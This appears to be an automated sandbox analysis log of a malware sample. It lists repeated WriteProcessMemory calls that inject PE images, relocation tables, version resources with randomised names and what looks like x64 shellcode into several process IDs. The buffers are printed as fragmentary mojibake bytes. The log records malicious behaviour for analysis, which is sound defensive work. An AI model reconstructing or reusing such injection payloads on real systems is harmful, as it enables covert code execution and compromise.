WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: üHÎHçHäðèÈAQAPRQVH1ÒeHR`HRHR HrPH·JJM1ÉH1À¬<a\|, AÁÉ AÁâíRAQHR B<HÐfxurHÀtgHÐPHD@ IÐãVHÿÉA4HÖM1ÉH1À¬AÁÉ AÁ8àuñLL$E9ÑuØXD@$IÐfAHD@IÐAHÐAXAX^YZAXAYAZHì ARÿàXAYZHéOÿÿÿ]M1ÉAQHFPÿvÿvAQAQI¸H1ÒHAºÈ8¤@ÿÕHÀtH¸ë H¸HÄPHüÃUåVWuMèXÀ%ìâÇB3è Ä_^]Â<$ÿ*H1ÀWÿÖ_PÇD$#<$ÿ,$ base_address: 0x0040d000 process_identifier: 2488 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0HXð¨äñRTô¥©¡¤}!äM¡KA)ûD×¤I^º¬;C¤)ê 2V½)áäÈ««Äª2B_9áñf [Kf»R\J¦×ü¤,+Ï¯Êà3,òW]@°(m ´Kí:¯ê{ËµÇÂ¯¦´îõÁ`ßÀS7BµçëUjM¹t4±úVºíq¾B,/îÑ6$ÂÂ¤øÛøF¬b¸Ðd·áÎÃ@kr·I÷\®Wõ6 wkel³IBøÛ ØyJ¢ÈñªfÚÔ)æ¨¤ºD base_address: 0x0040f000 process_identifier: 2488 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0ð+646;6B6I6P6W6^6e6l6s6z666666¤6«6²6¹6À6Ç6Î6Õ6Ü6ã6I7Z7·7È7@888899(9V9m9ð9ù9:::::¡:ª:¶:Ô:Û:â:B;K;R;Y;`;g;n;u;\|;;Ç;Î;Ø;à;å;î;ö;<+<A<H<O<V<Û<ä<ë<ò<ù<=====#==¨=´=»=Â=É=Ð=×=Þ=å=ì=ó=ú=>>>>>$>a>k>Ç>Ñ>?7???Ó?ß?@ÀÙ0à0ç0û011!1/1=1M1]1W3w3Æ344ä4}555ø5677®7»7×78J88Ë8ç8ó8909;9A9L9U9b999¢9¨9²9·9Â9Ë9Ó9à9æ9ð9õ9ý9:::!:+:0:8:>:M:ñ:N;d;;Ã;Ñ;×;ã;e<<À<:=~==§=³=Ð=Ü=ù=>ö>f???Ã?É?ï?ô?P\| 00R0\00¤01&1è1H2\23¡3Å3ç3ú45$5559û9:::;;;Ð;è;<<?<q<É<å<'=1=K>U>Ê>?$?.?I?^?k?x????¡?¬?·?Â?È?Ò?ç?ñ?`0C0U0m00®0´0Ò0æ0ì0÷011g11¢1Ú122¶2Ë2ì233,3U3y333Á3Ì3Ø3Ý3 4w4Ä4â4ï455j5v555»5È5Ð;Ý;ü;,<\<p<< ===3=D=\===Î=>/>>>Ä>å>ï>û?p¨00ñ0n1Ú1ä12222M2h2ó2{3æ4ö4x5;6F6`6¹6Ô6ï6 7r777¾7Å7Ì7Ó7Ú7á7è7ï7ö7ý7888·8ø8:9]9p999Û9&:;:¥:Ù:;A;ý;<0<g<\|<<µ<Ô<ê<ï<ü<%=B=y===ß=ý=>6>Î>å>}??Â?Ú?ü?$ 000@0g000Ë0×011G1S1Å2Ï2î2û23,3b3l333¸3Â3Þ3è34434=4g4q4¢4¯4Þ4ë45(5S5`555Æ5Ó566E6R666Á6Ë6ê6ô6 77N7X777¿7É7ë7ø7+888e8r88©8Ô8á8 9929<9^9h99ª9Ú9ä9::H:U:::À:Ê:æ:ð:;;F;S;;;±;»;ê;ô;$<1<p<z<<¤<Ã<Ð<ø<=.=;=e=r===¼=Æ=å=ò=> >>>H>i>s>>¤>Ã>Û>÷>D?N?r?\|?¡?«?Ü?è?¨0%0D0N0p0}0°0½0ç0ô01(1L1Y111´1Á1â1ì12"2A2Q222Í2Ò2ú2ã5þ5656÷678838N8Ú89-9r9«9½9È9Ó9ê9`::¼:Â:;$;3;N;];o;Ï;ë;ý; <<F<o<<³<Æ<ï<=>>Â>?U?_???ó? ¸0å0õ0 1:1T1m1}11®1Ä1×1à1ÿ12~22»2Å2(323k3u33¦3²3444²4555ø5'6<6Z6f6p67%7I7Y7Î7Ø7"8e88ª8ò859O9[9e9;;>?2?°`0D0þ01*1§1ä12µ2Â2_3Ñ3ü35V56'646±6î6¨7Ç7Ô7:;¿<Ð<á<í<þ<==!=4===¿=å=ú= >.?>?®? base_address: 0x00410000 process_identifier: 2488 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2488 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à hS$0@pjí 10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ @0@.bssf°`À.edata1 @0@.idataä0@0À.rsrcÀP¤@@.relocô `¨@0B base_address: 0x00400000 process_identifier: 3472 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: zR\|(Peÿÿ9AAC qAÃAÆHdeÿÿ,C h`\|eÿÿ,C hxeÿÿFC0BÌeÿÿFC0B¨fÿÿ>C0zzR\| fÿÿaAC0\| AÃA @`fÿÿaAC0\| AÃA d¬fÿÿaAC0\| AÃA øfÿÿICZ ES EJzR\|ÌÿÿzR\|àfÿÿ+C gzR\| àfÿÿKDA}ÃEÆ0@gÿÿAACH AÃAÆAÇ,txgÿÿ\AAN ÃAÆAHÃAÆT¤¨gÿÿAAACE@M AÃAÆAÇAÅAW EÃAÆAÇAÅE8üàgÿÿAACCCPAÃAÆAÇAÅ<8DhÿÿyAAFAC@hAÃAÆAÇAÅ4xiÿÿþAAAC Ø AÃAÆAÇA °LjÿÿAC x AÃA4Ô¸jÿÿAAAC0a AÃAÆAÇA4kÿÿAAAC0a AÃAÆAÇA4DhkÿÿAAAC0p AÃAÆAÇAzR\|<¸kÿÿÑAAAAC`0 CÃAÆAÇAÅAzR\|<@nÿÿ¸ACAAC@ AÃAÆAÇAÅA<\ÀoÿÿqAAAACpt AÃAÆAÇAÅAzR\|<hxÿÿ`AAAAC@2 AÃAÆAÇAÅAzR\|<pyÿÿ?AB FÚ ÃAÆAÇAÅAµ ÃAÆAÇAÅA base_address: 0x0042a000 process_identifier: 3472 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: r:k_( ( ( ( base_address: 0x00432000 process_identifier: 3472 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0 HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00435000 process_identifier: 3472 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: X 00 0+010;0E0¦0Ä0Ë0å0ñ0122K3W3¢3944y5T6?8¿8Ò9Ú9Z:;!=+=6=Ü=æ=ñ=>í>!?+?6? `Î14<4{44¢4´4Æ4Ý4è4j555£5µ5Ì5×5c6z666®6Å6Ð6R7i7y777´7¿7p9:;:q:::§:Ç:å: ;ª<è?÷?0800+0¸0Ç0Ö0í0ÿ0¦1²1Æ1Ý1ï1!2,2M2\23333.393@3G3\3d3k3r33333³3»3Â3É3Û3æ3í3ô3 444 424=4D4K4R5Y5o5y555ª5´5Ì5Ó5ç5î5ÿ566&6E6L6_6i6666¢6±6¸6Ð6Ý6ç6ö677+767W7i7©7»7Ñ7ã7!888N8f8¡8«8Â8Ø8é9ð9::!:(:@:L:h:o:::¤:«:µ:¼:å:ì:ý:;;%;9;F;R;Y;s;};;;;;Õ;Ü;÷;<$<.<L<`<x<<¢<´<Ã<Ö<ì<=??I?]?d?Í?î?@$0,0N0»1Ø1ù1 232¸24(4L4]444Ë4A5G5T5¯5Ê5Ñ5Û5â5é5ñ5ø5 666,656?6F6M6Z6a6l6u6\|6666¦66º6Á6Ì6Õ6Ü6é6ð677'7-747=7d7k7í7õ7ü7 888%8-848A8I8P8h8u888¥8²8É8Õ8â8ø89(9/969U9j9:;:C:M:ò:;#;-;y;á;< <<<8<M<_<<Ú<ö<1=H====¥=¬=³=º=Ã=Ê=Ñ=Ø=å= >,>K>R>k>~>>>¦>«>±>K?T???²?Ö?Ý?æ?ú?P r000000¥0Y1h1w1í1 22+2;2H2T2e2t222¡2°2¿2Î2Ý2ì2û2 3(3-3E3J3h3m333»3Þ3ã3³4º4×4é4 55!5(555=5I5P5a5i5q5x55Ê5Õ5_<ü<Ì=>>F>K>X>Æ>ó>þ>?`?k?????`P 000;0¸0Ñ0Ù0í12&202C2H2M2[222£2½23Í4c68&8P89#:Ò:Ç<==5=¼=>¿>£?¾?p, 0À455?5e5¬5N6©78:;Ã;à;ø;<ú<U=0¦0ô2W3m3}3V5a6v666À67~77ü7S8Ú8æ899B99ý9::¾:Ä:Ú:á:ï:X;^;;¥;»;Â;Î;Ú;!<^<â<è<þ<====É=Ï=å=ì=8>¶>Ã>ê>÷>?4??°?Ì?á?Ä 0$0<0T0l000´0Ì0ä0ü01,1a1l11¤1©1³1Ý120262A223313D333Ë3Ó3è344;4k4s444ï466Ò6ß6ÿ67S7`77¢7¶7Â7Þ7æ788\|89F9Ý9:£:;¯;<<Q<i<<<©<¸<Ó<ï<==='=7=[=¹=Á=>4?a??º?×?à?é?ò?û? \|0 000(010:0C0L0+1511292©2¶2Å2÷2633½3Ð3Ü3ö3þ34444i44>555466 77g7o7_8s88Â8Ê8Ù89V9z9´9»9Ð9å9:u::®:Î:K;°0Ì:¯;õ;<<ä<=§=Ë=>;>î>?&?E??Â?å?ÿ?Àx0¦0È0U1{11×1ã1ø12.2w222»2Î23#3M33²3Í3ø3#4N4y4¤4Ï4ú4#5J5s55õ5 68:9:;:¨:Þ:F<= =R=^==ø=G>[>>Î>?T?\|??Ðhä0A11´1ç1$2T22Ä2ô2'3d33Ç3484k4ë4ý5Z66Í67=7m7 7Ý7 8@8}88à89Q99:>;3<<Õ<!=>>u>?1?^?Û?ü?à<ï0º2]3ý5¥6ð6797x7¤7î78S8w8«8Ì8è89"9<9Z97<o>9?A?N?ð@ò1{33£3Í6ª7ñ9\:\|:;;³;==ð=>>,>>>ñ>? ?-???ò?h0!0.000ó01"1/111ê1þ12&222á2õ233x334::±:½:C;;<==¥=ª=¯=´=¹=À=Ñ=î=û=>>%>9>>>U>,?4!6H7Æ7U8Ô8¥9à9:;<è<}=?l??§?³? y0Ð1C2M2b2ü28"=0r<=¨=>Ô>à>@\0à0ì0c1x11Å1ß1í1223È34!4W44£4Ì4 55À5á5÷56Y6Ü6ô6s7Â7q89¶:+;;Ñ;2<=Ñ=û=Ä?PA2 2`D}0Ð0]1d11´1ö13¥3¬3×3Þ344444¡4555Æ6Í679>96<C<P<í<ô<pª=»=Ì=>>\?e?p0¹778B8h8#98;æ;62F2v4}4 4Î3Õ34 474»4Â499þ;<m<s<<=<=W=B>U>b>®>µ>° ¨1¯1¤45m5M6Z688:µ:ÀG?k?Ð(1X1µ1¡2®2»23ª3Ý3X7_79s=O>V>àY0ê4ñ4¦:¢;ø;)=H=ð(A3H34m5k7b9°<¾?Æ?Î?Ö?Þ?æ?î?ö?þ?¤0000&0.060>0F0N0V0^0f0n0v0~00000¦0®0¶0¾0Æ0Î0Ö0Þ0æ0î0ö0þ01111&1.161>1F1N1V1^1f1n1v1~11111¦1®1¶1¾1Æ1Î1Ö1Þ1æ1î1ö1þ12222&2.262>2F2N2V2^2f2n2v2~22222¦2®2¶2¾2Æ2Î2Ö2Þ2æ2î2ö2þ23333&3.363>3F3N3V3^3f3n3v3~33333¦3®3¶3¾3Æ3Î3Ö3Þ3æ3î3ö3þ34444&4.464>4F4N4V4^4f4n4v4~44444¦4®4¶4¾4Æ4Î4Ö4Þ4æ4î4ö4þ45555&5.565>5F5N5V5^556o6¿6 7>7E7K7y7®7µ7»7é78%8+8Ñ8 >>>/>6><>>Ç>Î>Ô>*?W?^?d?ö?ý?H0<1C1I1Ë2Ò2Ø254<4B4444u8\|88ö:ý:;>;>E>W>a>°>¾>Ë>Ò>ú>?? 11161=1C1P4 ;¤;¨;¬;°;´;¸;¼;À;Ä;È;Ì;Ð;Ô;Ø;Ü;à;ä;è;ì;ð;ô;ø;ü;<<<<<<<< <$<(<,<0<4<8<<<@<D<H<L<`<d<h<l<p<t<x<\|<<======= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=\|========= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>>>>>>> >$>(>,>0>4>8><>@>D>H>L>À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?p°L0P0T0X0\0`0d0h0l0p0t0¤6¨6¬6°6´6¸6¼6À6Ä6È6Ì6Ð677777 7::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:\|::::::::: :¤:¨:¬:°:´:¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:0000$0,040<0D0L0 base_address: 0x00436000 process_identifier: 3472 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3472 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!PELù½O[à²ÊaÐ@@ð.textÛ±² `.dataÐ¶@À.rsrcð¸@@.relocº@B base_address: 0x00400000 process_identifier: 5808 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: üHÎHçHäðèÈAQAPRQVH1ÒeHR`HRHR HrPH·JJM1ÉH1À¬<a\|, AÁÉ AÁâíRAQHR B<HÐfxurHÀtgHÐPHD@ IÐãVHÿÉA4HÖM1ÉH1À¬AÁÉ AÁ8àuñLL$E9ÑuØXD@$IÐfAHD@IÐAHÐAXAX^YZAXAYAZHì ARÿàXAYZHéOÿÿÿ]M1ÉAQHFPÿvÿvAQAQI¸H1ÒHAºÈ8¤@ÿÕHÀtH¸ë H¸HÄPHüÃUåVWuMèXÀ%ìâÇB3è Ä_^]Â<$ÿ*H1ÀWÿÖ_PÇD$#<$ÿ,$ base_address: 0x0040d000 process_identifier: 5808 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0HXð¨äñRTô¥©¡¤}!äM¡KA)ûD×¤I^º¬;C¤)ê 2V½)áäÈ««Äª2B_9áñf [Kf»R\J¦×ü¤,+Ï¯Êà3,òW]@°(m ´Kí:¯ê{ËµÇÂ¯¦´îõÁ`ßÀS7BµçëUjM¹t4±úVºíq¾B,/îÑ6$ÂÂ¤øÛøF¬b¸Ðd·áÎÃ@kr·I÷\®Wõ6 wkel³IBøÛ ØyJ¢ÈñªfÚÔ)æ¨¤ºD base_address: 0x0040f000 process_identifier: 5808 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0ð+646;6B6I6P6W6^6e6l6s6z666666¤6«6²6¹6À6Ç6Î6Õ6Ü6ã6I7Z7·7È7@888899(9V9m9ð9ù9:::::¡:ª:¶:Ô:Û:â:B;K;R;Y;`;g;n;u;\|;;Ç;Î;Ø;à;å;î;ö;<+<A<H<O<V<Û<ä<ë<ò<ù<=====#==¨=´=»=Â=É=Ð=×=Þ=å=ì=ó=ú=>>>>>$>a>k>Ç>Ñ>?7???Ó?ß?@ÀÙ0à0ç0û011!1/1=1M1]1W3w3Æ344ä4}555ø5677®7»7×78J88Ë8ç8ó8909;9A9L9U9b999¢9¨9²9·9Â9Ë9Ó9à9æ9ð9õ9ý9:::!:+:0:8:>:M:ñ:N;d;;Ã;Ñ;×;ã;e<<À<:=~==§=³=Ð=Ü=ù=>ö>f???Ã?É?ï?ô?P\| 00R0\00¤01&1è1H2\23¡3Å3ç3ú45$5559û9:::;;;Ð;è;<<?<q<É<å<'=1=K>U>Ê>?$?.?I?^?k?x????¡?¬?·?Â?È?Ò?ç?ñ?`0C0U0m00®0´0Ò0æ0ì0÷011g11¢1Ú122¶2Ë2ì233,3U3y333Á3Ì3Ø3Ý3 4w4Ä4â4ï455j5v555»5È5Ð;Ý;ü;,<\<p<< ===3=D=\===Î=>/>>>Ä>å>ï>û?p¨00ñ0n1Ú1ä12222M2h2ó2{3æ4ö4x5;6F6`6¹6Ô6ï6 7r777¾7Å7Ì7Ó7Ú7á7è7ï7ö7ý7888·8ø8:9]9p999Û9&:;:¥:Ù:;A;ý;<0<g<\|<<µ<Ô<ê<ï<ü<%=B=y===ß=ý=>6>Î>å>}??Â?Ú?ü?$ 000@0g000Ë0×011G1S1Å2Ï2î2û23,3b3l333¸3Â3Þ3è34434=4g4q4¢4¯4Þ4ë45(5S5`555Æ5Ó566E6R666Á6Ë6ê6ô6 77N7X777¿7É7ë7ø7+888e8r88©8Ô8á8 9929<9^9h99ª9Ú9ä9::H:U:::À:Ê:æ:ð:;;F;S;;;±;»;ê;ô;$<1<p<z<<¤<Ã<Ð<ø<=.=;=e=r===¼=Æ=å=ò=> >>>H>i>s>>¤>Ã>Û>÷>D?N?r?\|?¡?«?Ü?è?¨0%0D0N0p0}0°0½0ç0ô01(1L1Y111´1Á1â1ì12"2A2Q222Í2Ò2ú2ã5þ5656÷678838N8Ú89-9r9«9½9È9Ó9ê9`::¼:Â:;$;3;N;];o;Ï;ë;ý; <<F<o<<³<Æ<ï<=>>Â>?U?_???ó? ¸0å0õ0 1:1T1m1}11®1Ä1×1à1ÿ12~22»2Å2(323k3u33¦3²3444²4555ø5'6<6Z6f6p67%7I7Y7Î7Ø7"8e88ª8ò859O9[9e9;;>?2?°`0D0þ01*1§1ä12µ2Â2_3Ñ3ü35V56'646±6î6¨7Ç7Ô7:;¿<Ð<á<í<þ<==!=4===¿=å=ú= >.?>?®? base_address: 0x00410000 process_identifier: 5808 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 5808 process_handle: 0x00000224	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à hS$0@pjí 10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ @0@.bssf°`À.edata1 @0@.idataä0@0À.rsrcÀP¤@@.relocô `¨@0B base_address: 0x00400000 process_identifier: 6452 process_handle: 0x00000774	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: zR\|(Peÿÿ9AAC qAÃAÆHdeÿÿ,C h`\|eÿÿ,C hxeÿÿFC0BÌeÿÿFC0B¨fÿÿ>C0zzR\| fÿÿaAC0\| AÃA @`fÿÿaAC0\| AÃA d¬fÿÿaAC0\| AÃA øfÿÿICZ ES EJzR\|ÌÿÿzR\|àfÿÿ+C gzR\| àfÿÿKDA}ÃEÆ0@gÿÿAACH AÃAÆAÇ,txgÿÿ\AAN ÃAÆAHÃAÆT¤¨gÿÿAAACE@M AÃAÆAÇAÅAW EÃAÆAÇAÅE8üàgÿÿAACCCPAÃAÆAÇAÅ<8DhÿÿyAAFAC@hAÃAÆAÇAÅ4xiÿÿþAAAC Ø AÃAÆAÇA °LjÿÿAC x AÃA4Ô¸jÿÿAAAC0a AÃAÆAÇA4kÿÿAAAC0a AÃAÆAÇA4DhkÿÿAAAC0p AÃAÆAÇAzR\|<¸kÿÿÑAAAAC`0 CÃAÆAÇAÅAzR\|<@nÿÿ¸ACAAC@ AÃAÆAÇAÅA<\ÀoÿÿqAAAACpt AÃAÆAÇAÅAzR\|<hxÿÿ`AAAAC@2 AÃAÆAÇAÅAzR\|<pyÿÿ?AB FÚ ÃAÆAÇAÅAµ ÃAÆAÇAÅA base_address: 0x0042a000 process_identifier: 6452 process_handle: 0x00000774	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: r:k_( ( ( ( base_address: 0x00432000 process_identifier: 6452 process_handle: 0x00000774	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0 HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00435000 process_identifier: 6452 process_handle: 0x00000774	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: X 00 0+010;0E0¦0Ä0Ë0å0ñ0122K3W3¢3944y5T6?8¿8Ò9Ú9Z:;!=+=6=Ü=æ=ñ=>í>!?+?6? `Î14<4{44¢4´4Æ4Ý4è4j555£5µ5Ì5×5c6z666®6Å6Ð6R7i7y777´7¿7p9:;:q:::§:Ç:å: ;ª<è?÷?0800+0¸0Ç0Ö0í0ÿ0¦1²1Æ1Ý1ï1!2,2M2\23333.393@3G3\3d3k3r33333³3»3Â3É3Û3æ3í3ô3 444 424=4D4K4R5Y5o5y555ª5´5Ì5Ó5ç5î5ÿ566&6E6L6_6i6666¢6±6¸6Ð6Ý6ç6ö677+767W7i7©7»7Ñ7ã7!888N8f8¡8«8Â8Ø8é9ð9::!:(:@:L:h:o:::¤:«:µ:¼:å:ì:ý:;;%;9;F;R;Y;s;};;;;;Õ;Ü;÷;<$<.<L<`<x<<¢<´<Ã<Ö<ì<=??I?]?d?Í?î?@$0,0N0»1Ø1ù1 232¸24(4L4]444Ë4A5G5T5¯5Ê5Ñ5Û5â5é5ñ5ø5 666,656?6F6M6Z6a6l6u6\|6666¦66º6Á6Ì6Õ6Ü6é6ð677'7-747=7d7k7í7õ7ü7 888%8-848A8I8P8h8u888¥8²8É8Õ8â8ø89(9/969U9j9:;:C:M:ò:;#;-;y;á;< <<<8<M<_<<Ú<ö<1=H====¥=¬=³=º=Ã=Ê=Ñ=Ø=å= >,>K>R>k>~>>>¦>«>±>K?T???²?Ö?Ý?æ?ú?P r000000¥0Y1h1w1í1 22+2;2H2T2e2t222¡2°2¿2Î2Ý2ì2û2 3(3-3E3J3h3m333»3Þ3ã3³4º4×4é4 55!5(555=5I5P5a5i5q5x55Ê5Õ5_<ü<Ì=>>F>K>X>Æ>ó>þ>?`?k?????`P 000;0¸0Ñ0Ù0í12&202C2H2M2[222£2½23Í4c68&8P89#:Ò:Ç<==5=¼=>¿>£?¾?p, 0À455?5e5¬5N6©78:;Ã;à;ø;<ú<U=0¦0ô2W3m3}3V5a6v666À67~77ü7S8Ú8æ899B99ý9::¾:Ä:Ú:á:ï:X;^;;¥;»;Â;Î;Ú;!<^<â<è<þ<====É=Ï=å=ì=8>¶>Ã>ê>÷>?4??°?Ì?á?Ä 0$0<0T0l000´0Ì0ä0ü01,1a1l11¤1©1³1Ý120262A223313D333Ë3Ó3è344;4k4s444ï466Ò6ß6ÿ67S7`77¢7¶7Â7Þ7æ788\|89F9Ý9:£:;¯;<<Q<i<<<©<¸<Ó<ï<==='=7=[=¹=Á=>4?a??º?×?à?é?ò?û? \|0 000(010:0C0L0+1511292©2¶2Å2÷2633½3Ð3Ü3ö3þ34444i44>555466 77g7o7_8s88Â8Ê8Ù89V9z9´9»9Ð9å9:u::®:Î:K;°0Ì:¯;õ;<<ä<=§=Ë=>;>î>?&?E??Â?å?ÿ?Àx0¦0È0U1{11×1ã1ø12.2w222»2Î23#3M33²3Í3ø3#4N4y4¤4Ï4ú4#5J5s55õ5 68:9:;:¨:Þ:F<= =R=^==ø=G>[>>Î>?T?\|??Ðhä0A11´1ç1$2T22Ä2ô2'3d33Ç3484k4ë4ý5Z66Í67=7m7 7Ý7 8@8}88à89Q99:>;3<<Õ<!=>>u>?1?^?Û?ü?à<ï0º2]3ý5¥6ð6797x7¤7î78S8w8«8Ì8è89"9<9Z97<o>9?A?N?ð@ò1{33£3Í6ª7ñ9\:\|:;;³;==ð=>>,>>>ñ>? ?-???ò?h0!0.000ó01"1/111ê1þ12&222á2õ233x334::±:½:C;;<==¥=ª=¯=´=¹=À=Ñ=î=û=>>%>9>>>U>,?4!6H7Æ7U8Ô8¥9à9:;<è<}=?l??§?³? y0Ð1C2M2b2ü28"=0r<=¨=>Ô>à>@\0à0ì0c1x11Å1ß1í1223È34!4W44£4Ì4 55À5á5÷56Y6Ü6ô6s7Â7q89¶:+;;Ñ;2<=Ñ=û=Ä?PA2 2`D}0Ð0]1d11´1ö13¥3¬3×3Þ344444¡4555Æ6Í679>96<C<P<í<ô<pª=»=Ì=>>\?e?p0¹778B8h8#98;æ;62F2v4}4 4Î3Õ34 474»4Â499þ;<m<s<<=<=W=B>U>b>®>µ>° ¨1¯1¤45m5M6Z688:µ:ÀG?k?Ð(1X1µ1¡2®2»23ª3Ý3X7_79s=O>V>àY0ê4ñ4¦:¢;ø;)=H=ð(A3H34m5k7b9°<¾?Æ?Î?Ö?Þ?æ?î?ö?þ?¤0000&0.060>0F0N0V0^0f0n0v0~00000¦0®0¶0¾0Æ0Î0Ö0Þ0æ0î0ö0þ01111&1.161>1F1N1V1^1f1n1v1~11111¦1®1¶1¾1Æ1Î1Ö1Þ1æ1î1ö1þ12222&2.262>2F2N2V2^2f2n2v2~22222¦2®2¶2¾2Æ2Î2Ö2Þ2æ2î2ö2þ23333&3.363>3F3N3V3^3f3n3v3~33333¦3®3¶3¾3Æ3Î3Ö3Þ3æ3î3ö3þ34444&4.464>4F4N4V4^4f4n4v4~44444¦4®4¶4¾4Æ4Î4Ö4Þ4æ4î4ö4þ45555&5.565>5F5N5V5^556o6¿6 7>7E7K7y7®7µ7»7é78%8+8Ñ8 >>>/>6><>>Ç>Î>Ô>*?W?^?d?ö?ý?H0<1C1I1Ë2Ò2Ø254<4B4444u8\|88ö:ý:;>;>E>W>a>°>¾>Ë>Ò>ú>?? 11161=1C1P4 ;¤;¨;¬;°;´;¸;¼;À;Ä;È;Ì;Ð;Ô;Ø;Ü;à;ä;è;ì;ð;ô;ø;ü;<<<<<<<< <$<(<,<0<4<8<<<@<D<H<L<`<d<h<l<p<t<x<\|<<======= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=\|========= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>>>>>>> >$>(>,>0>4>8><>@>D>H>L>À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?p°L0P0T0X0\0`0d0h0l0p0t0¤6¨6¬6°6´6¸6¼6À6Ä6È6Ì6Ð677777 7::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:\|::::::::: :¤:¨:¬:°:´:¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:0000$0,040<0D0L0 base_address: 0x00436000 process_identifier: 6452 process_handle: 0x00000774	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 6452 process_handle: 0x00000774	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELPÅ`àl @ à@ÈS ÀÀ H.text$k l `.rsrcÀ n@@.relocÀr@B base_address: 0x00400000 process_identifier: 5484 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: 0 HX häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsCIty WIJv(CompanyNameMUC8FileDescriptionCZO JZt0FileVersion0.3.6.2: InternalNameNQyc QPy.exez+LegalCopyrightCopyright 2020 © TBq. All rights reserved.2LegalTrademarksIwOGB OriginalFilenameNQyc QPy.exe2 ProductNameNQyc QPy4ProductVersion8.8.7.68Assembly Version8.8.7.6DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0040a000 process_identifier: 5484 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: ; base_address: 0x0040c000 process_identifier: 5484 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 5484 process_handle: 0x000007dc	1	1
WriteProcessMemory June 21, 2021, 12:58 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELPÅ`àl @ à@ÈS ÀÀ H.text$k l `.rsrcÀ n@@.relocÀr@B base_address: 0x00400000 process_identifier: 1048 process_handle: 0x00000784	1	1
